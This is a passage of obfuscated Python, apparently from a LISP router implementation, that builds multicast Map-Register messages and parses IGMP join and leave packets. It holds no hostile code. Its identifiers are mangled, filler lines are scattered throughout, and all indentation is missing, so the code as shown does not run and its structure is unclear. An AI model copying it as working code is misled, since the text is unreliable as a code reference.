if 66 - 66: i11iIiiIii / Ooo00oOo00o - OoooooooOO / i1IIi . i11iIiiIii
if 16 - 16: OoO0O00 % oOoO0oo0OOOo + OoOO0ooOOoo0O - O0 . i1I1ii1II1iII / o0oo0o
if 35 - 35: iiiiIi11i / o0oo0o / II111iiii - iIii1I11I1II1 + II111iiii . o0oo0o
if 81 - 81: i1I1ii1II1iII * II11iiII - oOoO0oo0OOOo * o0000oOoOoO0o % oOo0O0Ooo * oOo0O0Ooo
if 59 - 59: iIii1I11I1II1
if 7 - 7: II11iiII * oo / Ooo00oOo00o * i11iIiiIii
o00 = [ ]
for i1OOO0000oO , ooO , II1i111 in entries :
if ( i1OOO0000oO != None ) : continue
o00 . append ( [ ooO , II1i111 ] )
if 50 - 50: oooO0oo0oOOOO % i1IIi
if 21 - 21: OoooooooOO - iIii1I11I1II1
o0o0O00oo0 = lisp . lisp_decent_pull_xtr_configured ( )
if 93 - 93: iiiiIi11i - Ooo00oOo00o % oOo0O0Ooo . oOo0O0Ooo - Oo
IIIII = { }
entries = [ ]
for ooO , II1i111 in o00 :
O00ooOo = None
for I1111IIi in lisp . lisp_group_mapping_list . values ( ) :
ii1 = oO00oOo0OOO ( ooO , I1111IIi )
if ( ii1 == - 1 ) : continue
if ( O00ooOo == None or ii1 > O00ooOo . group_prefix . mask_len ) :
O00ooOo = I1111IIi
if 80 - 80: Ooo00oOo00o - II11iiII + OoooooooOO
if 98 - 98: II11iiII + i1IIi . oo - II111iiii - Ooo00oOo00o
if ( O00ooOo == None ) :
lisp . lprint ( "No group-mapping for {}, could be underlay group" . format ( ooO ) )
if 24 - 24: OoO0O00 - i1IIi + OoOO0ooOOoo0O
continue
if 38 - 38: OoooooooOO / oOoO0oo0OOOo . O0 / i1IIi / OoO0O00 + iIii1I11I1II1
if 96 - 96: i1I1ii1II1iII
lisp . lprint ( "Use group-mapping '{}' {} for group {}" . format ( O00ooOo . group_name , O00ooOo . group_prefix . print_prefix ( ) , ooO ) )
if 18 - 18: i1I1ii1II1iII * OoOO0ooOOoo0O - o0000oOoOoO0o
OOOOoO00o0O = O00ooOo . group_prefix . instance_id
I111Ii111 = O00ooOo . use_ms_name
II1i1III = O00ooOo . rle_address
if 34 - 34: o0oo0o - i11iIiiIii / iIii1I11I1II1
if 87 - 87: oOoO0oo0OOOo / OoooooooOO - OoO0O00 % oOo0O0Ooo % oooO0oo0oOOOO % OoO0O00
if 29 - 29: OoooooooOO . oo % oOoO0oo0OOOo - i1I1ii1II1iII
if 8 - 8: i1IIi
if 32 - 32: iiiiIi11i / II111iiii
if 45 - 45: oOoO0oo0OOOo + ooOO00oOo * i11iIiiIii / II11iiII % OoOO0ooOOoo0O * O0
i1o0oooO = I111Ii111
if ( o0o0O00oo0 ) :
i1o0oooO = lisp . lisp_get_decent_dns_name_from_str ( OOOOoO00o0O , ooO )
IIIII [ i1o0oooO ] = [ "" , 0 ]
if 89 - 89: II111iiii / iiiiIi11i
if 14 - 14: II11iiII . oo * Oo + II111iiii - Oo + II11iiII
if ( len ( O00ooOo . sources ) == 0 ) :
entries . append ( [ "0.0.0.0" , ooO , OOOOoO00o0O , i1o0oooO , II1i1III , II1i111 ] )
continue
if 18 - 18: iiiiIi11i - Ooo00oOo00o - oo - oo
for IIiIi1iI in O00ooOo . sources :
IIIII [ i1o0oooO ] = [ "" , 0 ]
entries . append ( [ IIiIi1iI , ooO , OOOOoO00o0O , i1o0oooO , II1i1III , II1i111 ] )
if 54 - 54: OoO0O00 + oo / i1I1ii1II1iII . oo * oOo0O0Ooo
if 1 - 1: oOo0O0Ooo * ooOO00oOo . i1IIi / OoO0O00 . oOoO0oo0OOOo + OoO0O00
if 17 - 17: OoO0O00 + ooOO00oOo / o0000oOoOoO0o / i1I1ii1II1iII * II11iiII
i1I = len ( entries )
if ( i1I == 0 ) : return
if 29 - 29: ooOO00oOo % OoooooooOO * iiiiIi11i / II111iiii - iiiiIi11i
lisp . lprint ( "Build Map-Register for {} multicast entries" . format ( i1I ) )
if 19 - 19: i11iIiiIii
if 54 - 54: II111iiii . OoOO0ooOOoo0O
if 73 - 73: oOo0O0Ooo . oo
if 32 - 32: oOo0O0Ooo * oo % Oo * o0000oOoOoO0o . O0
if 48 - 48: i1I1ii1II1iII * i1I1ii1II1iII
if 13 - 13: o0000oOoOoO0o / OoOO0ooOOoo0O + oOo0O0Ooo . Ooo00oOo00o % Oo
IiIi1 = lisp . lisp_rle_node ( )
IiIi1 . level = 128
oo00ooOoo = lisp . lisp_get_any_translated_rloc ( )
II1i1III = lisp . lisp_rle ( "" )
II1i1III . rle_nodes . append ( IiIi1 )
if 28 - 28: o0000oOoOoO0o
if 1 - 1: o0000oOoOoO0o
if 48 - 48: O0 + O0 . o0oo0o - Oo
if 63 - 63: iiiiIi11i
if 71 - 71: i1IIi . o0000oOoOoO0o * i1I1ii1II1iII % OoooooooOO + II11iiII
if 36 - 36: oooO0oo0oOOOO
if ( o0o0O00oo0 == False ) :
for oO0OOoO0 in lisp . lisp_map_servers_list . values ( ) :
IIIII [ oO0OOoO0 . ms_name ] = [ "" , 0 ]
if 49 - 49: II11iiII / OoooooooOO / oo
if 74 - 74: o0oo0o % oOoO0oo0OOOo
if 7 - 7: II111iiii
iI = None
if ( lisp . lisp_nat_traversal ) : iI = lisp . lisp_hostname
if 38 - 38: oooO0oo0oOOOO . o0000oOoOoO0o
if 24 - 24: Ooo00oOo00o - Ooo00oOo00o + oOoO0oo0OOOo + oo - iiiiIi11i
if 12 - 12: i1I1ii1II1iII . oooO0oo0oOOOO . oOo0O0Ooo / O0
if 58 - 58: Ooo00oOo00o - II111iiii % iiiiIi11i + o0oo0o . oOo0O0Ooo / oooO0oo0oOOOO
II = 0
for IIiIi in lisp . lisp_rtr_list . values ( ) :
if ( IIiIi == None ) : continue
II += 1
if 94 - 94: OoOO0ooOOoo0O + II111iiii % i11iIiiIii
if 8 - 8: Oo * O0
if 73 - 73: Ooo00oOo00o / iiiiIi11i / OoOO0ooOOoo0O / ooOO00oOo
if 11 - 11: oOo0O0Ooo + oooO0oo0oOOOO - OoooooooOO / ooOO00oOo
if 34 - 34: Oo
O0O0O0Oo = ""
for i1OOO0000oO , ooO , OOOOoO00o0O , O000 , i1iI1 , II1i111 in entries :
if 44 - 44: oOoO0oo0OOOo - o0000oOoOoO0o / II111iiii * ooOO00oOo * OoO0O00
if 73 - 73: Ooo00oOo00o - oo * i1IIi / i11iIiiIii * II11iiII % II111iiii
if 56 - 56: OoooooooOO * OoO0O00 . OoO0O00 . oOoO0oo0OOOo
if 24 - 24: OoO0O00 . OoOO0ooOOoo0O * o0000oOoOoO0o % i1I1ii1II1iII / II11iiII
if ( IIIII . has_key ( O000 ) == False ) : continue
if 58 - 58: oo - oOoO0oo0OOOo % O0 . oo % ooOO00oOo % oooO0oo0oOOOO
I1I1I1IIi1III = lisp . lisp_eid_record ( )
I1I1I1IIi1III . rloc_count = 1 + II
I1I1I1IIi1III . authoritative = True
I1I1I1IIi1III . record_ttl = lisp . LISP_REGISTER_TTL if II1i111 else 0
I1I1I1IIi1III . eid = lisp . lisp_address ( O0O00OOo , i1OOO0000oO , 0 , OOOOoO00o0O )
if ( I1I1I1IIi1III . eid . address == 0 ) : I1I1I1IIi1III . eid . mask_len = 0
I1I1I1IIi1III . group = lisp . lisp_address ( O0O00OOo , ooO , 0 , OOOOoO00o0O )
if ( I1I1I1IIi1III . group . is_mac_broadcast ( ) and I1I1I1IIi1III . eid . address == 0 ) : I1I1I1IIi1III . eid . mask_len = 0
if 87 - 87: iiiiIi11i - i11iIiiIii
if 78 - 78: i11iIiiIii / iIii1I11I1II1 - Ooo00oOo00o
oO0o0oooO0oO = ""
I111Ii111 = ""
if ( lisp . lisp_decent_pull_xtr_configured ( ) ) :
oO0o0oooO0oO = lisp . lisp_get_decent_index ( I1I1I1IIi1III . group )
oO0o0oooO0oO = lisp . bold ( str ( oO0o0oooO0oO ) , False )
oO0o0oooO0oO = "with decent-index {}" . format ( oO0o0oooO0oO )
else :
oO0o0oooO0oO = "for ms-name '{}'" . format ( O000 )
if 23 - 23: OoOO0ooOOoo0O
if 40 - 40: Ooo00oOo00o - II111iiii / OoO0O00
iiIiI1ii = lisp . green ( I1I1I1IIi1III . print_eid_tuple ( ) , False )
lisp . lprint ( " EID-prefix {} {}{}" . format ( iiIiI1ii , I111Ii111 ,
oO0o0oooO0oO ) )
if 56 - 56: OoooooooOO - OoOO0ooOOoo0O - i1IIi
O0O0O0Oo += I1I1I1IIi1III . encode ( )
I1I1I1IIi1III . print_record ( " " , False )
IIIII [ O000 ] [ 1 ] += 1
if 8 - 8: o0oo0o / II11iiII . oo + oOoO0oo0OOOo / i11iIiiIii
if 31 - 31: Oo - iIii1I11I1II1 + i1I1ii1II1iII . OoO0O00 / oooO0oo0oOOOO % iIii1I11I1II1
if 6 - 6: oooO0oo0oOOOO * i11iIiiIii % iIii1I11I1II1 % i11iIiiIii + Ooo00oOo00o / i1IIi
if 53 - 53: OoOO0ooOOoo0O + iIii1I11I1II1
i1II = lisp . lisp_rloc_record ( )
i1II . rloc_name = iI
if 70 - 70: oOoO0oo0OOOo
if 67 - 67: OoooooooOO
if 29 - 29: O0 - i11iIiiIii - II111iiii + II11iiII * oooO0oo0oOOOO
if 2 - 2: i1IIi - Oo + oo . Ooo00oOo00o * Ooo00oOo00o / oOo0O0Ooo
if 93 - 93: i1IIi
if 53 - 53: OoooooooOO + OoO0O00 + iiiiIi11i
if ( oo00ooOoo != None ) :
IiIi1 . address = oo00ooOoo
elif ( i1iI1 != None ) :
IiIi1 . address = i1iI1
else :
IiIi1 . address = i1iI1 = lisp . lisp_myrlocs [ 0 ]
if 24 - 24: i1I1ii1II1iII - oooO0oo0oOOOO - i1I1ii1II1iII * oOoO0oo0OOOo . OoooooooOO / oooO0oo0oOOOO
if 66 - 66: OoO0O00
i1II . rle = II1i1III
i1II . local_bit = True
i1II . reach_bit = True
i1II . priority = 255
i1II . weight = 0
i1II . mpriority = 1
i1II . mweight = 100
O0O0O0Oo += i1II . encode ( )
i1II . print_record ( " " )
if 97 - 97: i1IIi - OoooooooOO / o0oo0o * oo
if 55 - 55: Ooo00oOo00o . i1I1ii1II1iII
if 87 - 87: Ooo00oOo00o % iIii1I11I1II1
if 100 - 100: o0oo0o . oo * o0oo0o - oo . OoOO0ooOOoo0O * o0000oOoOoO0o
if 89 - 89: ooOO00oOo + oooO0oo0oOOOO * o0oo0o
for IIiIi in lisp . lisp_rtr_list . values ( ) :
if ( IIiIi == None ) : continue
i1II = lisp . lisp_rloc_record ( )
i1II . rloc . copy_address ( IIiIi )
i1II . priority = 254
i1II . rloc_name = "RTR"
i1II . weight = 0
i1II . mpriority = 255
i1II . mweight = 0
i1II . local_bit = False
i1II . reach_bit = True
O0O0O0Oo += i1II . encode ( )
i1II . print_record ( " RTR " )
if 28 - 28: OoooooooOO . iiiiIi11i % oOoO0oo0OOOo / i1IIi / II11iiII
if 36 - 36: Ooo00oOo00o + OoOO0ooOOoo0O - oooO0oo0oOOOO + iIii1I11I1II1 + OoooooooOO
if 4 - 4: II111iiii . OoOO0ooOOoo0O + o0000oOoOoO0o * o0oo0o . Oo
if 87 - 87: oOo0O0Ooo / ooOO00oOo / i11iIiiIii
if 74 - 74: iiiiIi11i / oOoO0oo0OOOo % Ooo00oOo00o
IIIII [ O000 ] [ 0 ] += O0O0O0Oo
if 88 - 88: oOo0O0Ooo - i11iIiiIii % Ooo00oOo00o * OoOO0ooOOoo0O + oOoO0oo0OOOo
if 52 - 52: II111iiii . oo + oOo0O0Ooo % ooOO00oOo
if 62 - 62: Ooo00oOo00o
if 15 - 15: OoOO0ooOOoo0O + o0000oOoOoO0o . II11iiII * ooOO00oOo . oOo0O0Ooo
if 18 - 18: i1IIi % II111iiii + o0oo0o % o0000oOoOoO0o
II11iI111i1 = lisp . lisp_map_register ( )
II11iI111i1 . nonce = 0xaabbccdddfdfdf00
II11iI111i1 . xtr_id_present = True
II11iI111i1 . proxy_reply_requested = True
II11iI111i1 . map_notify_requested = False
II11iI111i1 . merge_register_requested = True
if 72 - 72: iIii1I11I1II1
if 45 - 45: OoO0O00 - Ooo00oOo00o % o0oo0o
if 38 - 38: o0oo0o % II11iiII - OoooooooOO
if 87 - 87: ooOO00oOo % oo
for oO0OOoO0 in lisp . lisp_map_servers_list . values ( ) :
i1o0oooO = oO0OOoO0 . dns_name if o0o0O00oo0 else oO0OOoO0 . ms_name
if 77 - 77: iIii1I11I1II1 - i1IIi . iiiiIi11i
if 26 - 26: Ooo00oOo00o * oooO0oo0oOOOO . i1IIi
if 59 - 59: O0 + i1IIi - Ooo00oOo00o
if 62 - 62: i11iIiiIii % II11iiII . oooO0oo0oOOOO . II11iiII
if ( IIIII . has_key ( i1o0oooO ) == False ) : continue
if 84 - 84: i11iIiiIii * ooOO00oOo
if 18 - 18: II11iiII - o0000oOoOoO0o - oOo0O0Ooo / o0oo0o - O0
if 30 - 30: O0 + oOoO0oo0OOOo + II111iiii
if 14 - 14: Ooo00oOo00o / II11iiII - iIii1I11I1II1 - iiiiIi11i % Oo
II11iI111i1 . record_count = IIIII [ i1o0oooO ] [ 1 ]
if ( II11iI111i1 . record_count == 0 ) : continue
if 49 - 49: Oo * iiiiIi11i / Ooo00oOo00o / OoO0O00 * iIii1I11I1II1
II11iI111i1 . nonce += 1
II11iI111i1 . alg_id = oO0OOoO0 . alg_id
II11iI111i1 . alg_id = oO0OOoO0 . key_id
II11iI111i1 . xtr_id = oO0OOoO0 . xtr_id
II11iI111i1 . site_id = oO0OOoO0 . site_id
II11iI111i1 . encrypt_bit = ( oO0OOoO0 . ekey != None )
oOO0 = II11iI111i1 . encode ( )
II11iI111i1 . print_map_register ( )
if 57 - 57: oOo0O0Ooo - iiiiIi11i / Oo % i11iIiiIii
if 3 - 3: i1I1ii1II1iII . Oo % oo + oOoO0oo0OOOo
if 64 - 64: i1IIi
if 29 - 29: Ooo00oOo00o / i11iIiiIii / oo % iiiiIi11i % i11iIiiIii
if 18 - 18: II11iiII + o0oo0o
oOoOOo0oo0 = II11iI111i1 . encode_xtr_id ( "" )
oOO0 = oOO0 + O0O0O0Oo + oOoOOo0oo0
if 80 - 80: iiiiIi11i + Ooo00oOo00o * o0000oOoOoO0o + ooOO00oOo
oO0OOoO0 . map_registers_multicast_sent += 1
lisp . lisp_send_map_register ( lisp_sockets , oOO0 , II11iI111i1 , oO0OOoO0 )
if 75 - 75: OoOO0ooOOoo0O / Ooo00oOo00o / II11iiII / oooO0oo0oOOOO % Oo + II111iiii
if 4 - 4: i1I1ii1II1iII - OoO0O00 - oooO0oo0oOOOO - OoOO0ooOOoo0O % i11iIiiIii / ooOO00oOo
if 50 - 50: Oo + i1IIi
if 31 - 31: o0000oOoOoO0o
oO0OOoO0 . resolve_dns_name ( )
if 78 - 78: i11iIiiIii + Ooo00oOo00o + o0oo0o / Ooo00oOo00o % iIii1I11I1II1 % oooO0oo0oOOOO
if 83 - 83: iIii1I11I1II1 % oOo0O0Ooo % Ooo00oOo00o % o0oo0o . oOoO0oo0OOOo % O0
if 47 - 47: Ooo00oOo00o
if 66 - 66: oo - oooO0oo0oOOOO
time . sleep ( .001 )
if 33 - 33: oo / ooOO00oOo
return
if 12 - 12: II111iiii
if 2 - 2: i1IIi - oo + OoOO0ooOOoo0O . II111iiii
if 25 - 25: iiiiIi11i
if 34 - 34: oOo0O0Ooo . iIii1I11I1II1 % O0
if 43 - 43: oOoO0oo0OOOo - i1I1ii1II1iII
O000O = { 1 : "include-mode" , 2 : "exclude-mode" ,
3 : "change-to-include" , 4 : "change-to-exclude" , 5 : "allow-new-source" ,
6 : "block-old-sources" }
if 98 - 98: iIii1I11I1II1 + o0oo0o % oOo0O0Ooo + OoOO0ooOOoo0O % oOo0O0Ooo
if 24 - 24: iiiiIi11i * o0oo0o
if 40 - 40: o0000oOoOoO0o - oOo0O0Ooo * oOo0O0Ooo . oOo0O0Ooo + OoooooooOO
if 77 - 77: iIii1I11I1II1 . o0000oOoOoO0o % iiiiIi11i / o0000oOoOoO0o
if 54 - 54: iiiiIi11i + Oo - OoO0O00
if 35 - 35: o0000oOoOoO0o - o0000oOoOoO0o + i1IIi - O0 - o0oo0o
if 58 - 58: oOo0O0Ooo - i1I1ii1II1iII - OoooooooOO
if 96 - 96: iIii1I11I1II1
if 82 - 82: oOo0O0Ooo + O0 - oooO0oo0oOOOO % iiiiIi11i * i11iIiiIii
if 15 - 15: Ooo00oOo00o
if 39 - 39: II11iiII / oOoO0oo0OOOo / oo * o0oo0o
if 44 - 44: O0 + Oo . iIii1I11I1II1 + OoO0O00 / O0 - OoOO0ooOOoo0O
if 83 - 83: oooO0oo0oOOOO * OoOO0ooOOoo0O / OoO0O00
if 32 - 32: Ooo00oOo00o + oOo0O0Ooo - OoooooooOO
if 39 - 39: OoooooooOO * II11iiII * O0 . OoOO0ooOOoo0O . ooOO00oOo + Oo
if 9 - 9: oOo0O0Ooo + iiiiIi11i % OoooooooOO + Ooo00oOo00o
if 56 - 56: OoooooooOO + oOoO0oo0OOOo - i1I1ii1II1iII
if 24 - 24: Ooo00oOo00o + Oo + OoOO0ooOOoo0O - iIii1I11I1II1
if 49 - 49: OoOO0ooOOoo0O . Oo * oOo0O0Ooo % oooO0oo0oOOOO . O0
if 48 - 48: O0 * o0000oOoOoO0o - O0 / o0000oOoOoO0o + oOo0O0Ooo
if 52 - 52: ooOO00oOo % o0000oOoOoO0o * II111iiii
if 4 - 4: OoOO0ooOOoo0O % O0 - OoooooooOO + Oo . iiiiIi11i % II111iiii
if 9 - 9: II111iiii * II111iiii . i11iIiiIii * iIii1I11I1II1
if 18 - 18: ooOO00oOo . II111iiii % oOo0O0Ooo % o0000oOoOoO0o
if 87 - 87: iIii1I11I1II1 . OoooooooOO * oOo0O0Ooo
if 100 - 100: ooOO00oOo / i1IIi - oo % o0000oOoOoO0o - iIii1I11I1II1
if 17 - 17: OoOO0ooOOoo0O / Ooo00oOo00o % OoO0O00
if 71 - 71: oooO0oo0oOOOO . o0oo0o . ooOO00oOo
if 68 - 68: i11iIiiIii % iiiiIi11i * ooOO00oOo * oooO0oo0oOOOO * II111iiii + O0
if 66 - 66: OoOO0ooOOoo0O % oOoO0oo0OOOo % OoooooooOO
if 34 - 34: Ooo00oOo00o / i1I1ii1II1iII % O0 . ooOO00oOo . i1IIi
if 29 - 29: O0 . o0oo0o
if 66 - 66: iiiiIi11i * iIii1I11I1II1 % iIii1I11I1II1 * oooO0oo0oOOOO - Oo - oooO0oo0oOOOO
if 70 - 70: o0oo0o + iiiiIi11i
if 93 - 93: o0oo0o + o0000oOoOoO0o
if 33 - 33: O0
if 78 - 78: O0 / II111iiii * ooOO00oOo
if 50 - 50: OoooooooOO - iIii1I11I1II1 + i1IIi % o0oo0o - iIii1I11I1II1 % O0
if 58 - 58: oooO0oo0oOOOO + iIii1I11I1II1
if 65 - 65: II111iiii - o0oo0o % Ooo00oOo00o - oOo0O0Ooo * i1I1ii1II1iII + o0000oOoOoO0o
if 79 - 79: Oo . oOo0O0Ooo % o0oo0o - OoO0O00
if 69 - 69: Oo - Ooo00oOo00o . Oo
if 9 - 9: iiiiIi11i % i11iIiiIii / OoO0O00
if 20 - 20: iiiiIi11i * O0 + OoOO0ooOOoo0O - OoooooooOO . OoOO0ooOOoo0O
if 60 - 60: Ooo00oOo00o . Ooo00oOo00o / i1I1ii1II1iII
if 45 - 45: O0 . i11iIiiIii % i1I1ii1II1iII . oOo0O0Ooo % oooO0oo0oOOOO % iIii1I11I1II1
if 58 - 58: iIii1I11I1II1 . oOo0O0Ooo - i11iIiiIii * iIii1I11I1II1 % i11iIiiIii / oo
if 80 - 80: oOoO0oo0OOOo / iIii1I11I1II1 % oOo0O0Ooo
if 80 - 80: ooOO00oOo % i1I1ii1II1iII
if 99 - 99: Oo / iIii1I11I1II1 - o0000oOoOoO0o * oOoO0oo0OOOo % oo
if 13 - 13: ooOO00oOo
if 70 - 70: o0oo0o + O0 . iiiiIi11i * o0000oOoOoO0o
if 2 - 2: OoooooooOO . II11iiII . oooO0oo0oOOOO
if 42 - 42: II11iiII % iiiiIi11i / ooOO00oOo - iiiiIi11i * i11iIiiIii
if 19 - 19: iiiiIi11i * oo % i11iIiiIii
if 24 - 24: Ooo00oOo00o
if 10 - 10: Ooo00oOo00o % o0000oOoOoO0o / II11iiII
if 28 - 28: II11iiII % Oo
if 48 - 48: i11iIiiIii % iiiiIi11i
if 29 - 29: i1I1ii1II1iII + i11iIiiIii % OoOO0ooOOoo0O
if 93 - 93: oOo0O0Ooo % iIii1I11I1II1
if 90 - 90: oo - II11iiII / o0000oOoOoO0o / O0 / OoOO0ooOOoo0O
if 87 - 87: oOo0O0Ooo / oooO0oo0oOOOO + iIii1I11I1II1
if 93 - 93: iIii1I11I1II1 + iiiiIi11i % Oo
if 21 - 21: II11iiII
if 6 - 6: oooO0oo0oOOOO
if 46 - 46: oooO0oo0oOOOO + iiiiIi11i
if 79 - 79: OoooooooOO - oooO0oo0oOOOO * oooO0oo0oOOOO . oOo0O0Ooo
if 100 - 100: II111iiii * OoOO0ooOOoo0O % oo / oOoO0oo0OOOo
if 90 - 90: oOoO0oo0OOOo . Oo . oOo0O0Ooo . o0000oOoOoO0o
if 4 - 4: o0000oOoOoO0o + oOo0O0Ooo % oOoO0oo0OOOo / i11iIiiIii
if 74 - 74: II111iiii . O0 - oo + oooO0oo0oOOOO % i11iIiiIii % oOo0O0Ooo
if 78 - 78: o0000oOoOoO0o + oOo0O0Ooo + oooO0oo0oOOOO - oooO0oo0oOOOO . i11iIiiIii / ooOO00oOo
if 27 - 27: o0000oOoOoO0o - O0 % OoOO0ooOOoo0O * o0oo0o . oooO0oo0oOOOO % iIii1I11I1II1
if 37 - 37: OoooooooOO + O0 - i1IIi % Oo
def i1I1i1i ( packet ) :
global Oo0o0000o0o0
if 36 - 36: II111iiii % O0
IiIiiI11111I1 = lisp . bold ( "Receive" , False )
lisp . lprint ( "{} {}-byte IGMP packet: {}" . format ( IiIiiI11111I1 , len ( packet ) ,
lisp . lisp_format_packet ( packet ) ) )
if 35 - 35: iIii1I11I1II1 - II11iiII % Ooo00oOo00o
if 30 - 30: o0oo0o % o0oo0o % oooO0oo0oOOOO . oOo0O0Ooo
if 9 - 9: Oo / II111iiii . oOo0O0Ooo % Ooo00oOo00o * II111iiii - Oo
if 55 - 55: oo
Ii1i1 = ( struct . unpack ( "B" , packet [ 0 ] ) [ 0 ] & 0x0f ) * 4
if 65 - 65: iiiiIi11i + oOoO0oo0OOOo / II11iiII
if 85 - 85: iIii1I11I1II1 / OoooooooOO % II111iiii
if 49 - 49: i11iIiiIii % oOo0O0Ooo + o0oo0o . II111iiii % i1I1ii1II1iII * II11iiII
if 67 - 67: i1IIi
iii = packet [ Ii1i1 : : ]
oOOOo = struct . unpack ( "B" , iii [ 0 ] ) [ 0 ]
ooO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 31 - 31: oOo0O0Ooo + oOo0O0Ooo . i11iIiiIii / Oo % OoOO0ooOOoo0O / oOo0O0Ooo
IIiI1I111iIiI = ( oOOOo in ( 0x12 , 0x16 , 0x17 , 0x22 ) )
if ( IIiI1I111iIiI == False ) :
ooOoooOO0oOooO00 = "{} ({})" . format ( oOOOo , IiII1IiiIiI1 [ oOOOo ] ) if IiII1IiiIiI1 . has_key ( oOOOo ) else oOOOo
if 37 - 37: oooO0oo0oOOOO
lisp . lprint ( "IGMP type {} not supported" . format ( ooOoooOO0oOooO00 ) )
return
if 37 - 37: OoO0O00 / oooO0oo0oOOOO * O0
if 73 - 73: i1I1ii1II1iII * i1I1ii1II1iII / Oo
if ( len ( iii ) < 8 ) :
lisp . lprint ( "IGMP message too small" )
return
if 43 - 43: oOoO0oo0OOOo . i1IIi . oooO0oo0oOOOO + O0 * o0000oOoOoO0o * O0
if 41 - 41: oOoO0oo0OOOo + o0000oOoOoO0o % OoooooooOO . oOoO0oo0OOOo + i1I1ii1II1iII . i1I1ii1II1iII
if 31 - 31: i11iIiiIii + II111iiii . i1I1ii1II1iII * oOo0O0Ooo
if 66 - 66: oOo0O0Ooo + i1IIi % II111iiii . O0 * oOoO0oo0OOOo % oOoO0oo0OOOo
if 87 - 87: II11iiII + Ooo00oOo00o . i1I1ii1II1iII - OoooooooOO
if 6 - 6: iIii1I11I1II1 * OoooooooOO
ooO . address = socket . ntohl ( struct . unpack ( "II" , iii [ : 8 ] ) [ 1 ] )
iIiI1I1ii1I1 = ooO . print_address_no_iid ( )
if 83 - 83: II11iiII / O0 % i1I1ii1II1iII - Ooo00oOo00o . OoO0O00
if 49 - 49: iIii1I11I1II1 * i1IIi . OoooooooOO
if 90 - 90: Ooo00oOo00o % oOoO0oo0OOOo - iIii1I11I1II1 % oOo0O0Ooo
if 8 - 8: oOo0O0Ooo * OoO0O00 / oooO0oo0oOOOO % o0000oOoOoO0o - oo
if ( oOOOo == 0x17 ) :
lisp . lprint ( "IGMPv2 leave (*, {})" . format ( lisp . bold ( iIiI1I1ii1I1 , False ) ) )
Ii11iI ( Oo0o0000o0o0 ,
[ [ None , iIiI1I1ii1I1 , False ] ] )
return
if 71 - 71: i1I1ii1II1iII
if ( oOOOo in ( 0x12 , 0x16 ) ) :
lisp . lprint ( "IGMPv{} join (*, {})" . format ( 1 if ( oOOOo == 0x12 ) else 2 , lisp . bold ( iIiI1I1ii1I1 , False ) ) )
if 23 - 23: i1IIi . iIii1I11I1II1 . II11iiII . O0 % o0000oOoOoO0o % i11iIiiIii
if 11 - 11: O0 - II111iiii . II11iiII . o0000oOoOoO0o % o0oo0o
if 21 - 21: OoO0O00 / i1I1ii1II1iII . o0oo0o * OoooooooOO + OoOO0ooOOoo0O - i1IIi
if 58 - 58: oOoO0oo0OOOo
if 2 - 2: II111iiii / o0oo0o
if ( iIiI1I1ii1I1 . find ( "224.0.0." ) != - 1 ) :
lisp . lprint ( "Suppress registration for link-local groups" )
else :
Ii11iI ( Oo0o0000o0o0 ,
[ [ None , iIiI1I1ii1I1 , True ] ] )
if 54 - 54: i1IIi . OoOO0ooOOoo0O - oOoO0oo0OOOo + Oo + OoO0O00 / OoO0O00
if 22 - 22: Oo . iIii1I11I1II1
if 12 - 12: o0000oOoOoO0o
if 71 - 71: oo . II111iiii . oo - Oo
if 45 - 45: oooO0oo0oOOOO / O0 / oOo0O0Ooo * II11iiII
return
if 18 - 18: iIii1I11I1II1 + II11iiII + iIii1I11I1II1 . oOoO0oo0OOOo + o0oo0o . Oo
if 7 - 7: oOoO0oo0OOOo + iIii1I11I1II1 * OoOO0ooOOoo0O * OoOO0ooOOoo0O / II111iiii - o0000oOoOoO0o
if 65 - 65: iiiiIi11i + oOo0O0Ooo + II111iiii
if 77 - 77: II111iiii
if 50 - 50: O0 . O0 . Oo % OoO0O00
ooo000oOO = ooO . address
iii = iii [ 8 : : ]
if 27 - 27: Ooo00oOo00o * i11iIiiIii * ooOO00oOo
oOOoO = "BBHI"
oOo0Oo0O0O = struct . calcsize ( oOOoO )
III1II1i = "I"
iI1i1IiIIIIi = struct . calcsize ( III1II1i )
i1OOO0000oO = lisp . lisp_address ( lisp . LISP_AFI_IPV4 , "" , 32 , 0 )
if 65 - 65: O0 * oo / oo . oOo0O0Ooo
if 87 - 87: II111iiii * oOoO0oo0OOOo % OoO0O00 * OoO0O00
if 58 - 58: II11iiII . Ooo00oOo00o + oo % OoO0O00 - ooOO00oOo
if 50 - 50: i1I1ii1II1iII % II111iiii - Oo . i1IIi + O0 % i1I1ii1II1iII
i1iIi1IIiIII1 = [ ]
for oO0 in range ( ooo000oOO ) :
if ( len ( iii ) < oOo0Oo0O0O ) : return
i1Ii11I1II , oOOOoo0o , iiiI1IiIIii , IIIIiii = struct . unpack ( oOOoO ,
iii [ : oOo0Oo0O0O ] )
if 26 - 26: OoooooooOO - Oo * i11iIiiIii + O0 * iiiiIi11i
iii = iii [ oOo0Oo0O0O : : ]
if 87 - 87: OoO0O00 + O0 - OoOO0ooOOoo0O * iIii1I11I1II1 . o0oo0o % Ooo00oOo00o
if ( O000O . has_key ( i1Ii11I1II ) == False ) :
lisp . lprint ( "Invalid record type {}" . format ( i1Ii11I1II ) )
continue
if 83 - 83: II111iiii * i1IIi * i1I1ii1II1iII . oOoO0oo0OOOo / OoOO0ooOOoo0O + i1IIi
if 43 - 43: OoooooooOO
oOOO0 = O000O [ i1Ii11I1II ]
iiiI1IiIIii = socket . ntohs ( iiiI1IiIIii )
ooO . address = socket . ntohl ( IIIIiii )
iIiI1I1ii1I1 = ooO . print_address_no_iid ( )
if 32 - 32: Oo % o0oo0o * OoO0O00
lisp . lprint ( "Record type: {}, group: {}, source-count: {}" . format ( oOOO0 , iIiI1I1ii1I1 , iiiI1IiIIii ) )
if 72 - 72: Oo . i1I1ii1II1iII - o0oo0o - o0000oOoOoO0o % i1IIi
if 56 - 56: OoO0O00 * i1I1ii1II1iII
if 13 - 13: OoO0O00 * OoO0O00 * II111iiii * i1I1ii1II1iII . i1IIi / oooO0oo0oOOOO
if 92 - 92: o0000oOoOoO0o * i11iIiiIii + i1I1ii1II1iII * o0oo0o
if 48 - 48: OoOO0ooOOoo0O * i1I1ii1II1iII * i1I1ii1II1iII
if 70 - 70: iiiiIi11i + OoOO0ooOOoo0O % i11iIiiIii + O0
if 65 - 65: iIii1I11I1II1 % iiiiIi11i + O0 / OoooooooOO
II1i111 = False
if ( i1Ii11I1II in ( 1 , 5 ) ) : II1i111 = True
if ( i1Ii11I1II == 4 and iiiI1IiIIii == 0 ) : II1i111 = True
O0000oO0o00 = "join" if ( II1i111 ) else "leave"
